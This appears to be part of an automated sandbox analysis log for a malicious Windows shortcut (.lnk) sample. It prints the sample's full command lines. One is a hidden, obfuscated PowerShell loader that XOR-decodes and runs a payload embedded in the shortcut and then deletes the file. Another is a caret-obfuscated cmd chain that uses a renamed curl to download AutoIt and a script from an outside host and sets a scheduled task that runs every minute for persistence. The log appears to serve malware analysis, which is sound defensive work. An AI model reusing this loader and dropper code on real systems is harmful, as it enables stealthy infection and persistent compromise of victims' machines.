Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz||goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function 
vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"

Language, Device and Operating System Detection

Source: Yara match File source: knfV5IVjEV.lnk, type: SAMPLE
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DEBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 8_2_00007FF7F1DEBAFC
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DDF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 8_2_00007FF7F1DDF964
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DB2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 8_2_00007FF7F1DB2B14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DD2930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free, 8_2_00007FF7F1DD2930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DD0070 calloc,calloc,calloc,bind,WSAGetLastError, 8_2_00007FF7F1DD0070
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E8F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 12_2_00007FF700E8F964
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E82930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free, 12_2_00007FF700E82930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E62B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 12_2_00007FF700E62B14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E80070 calloc,calloc,calloc,bind,WSAGetLastError, 12_2_00007FF700E80070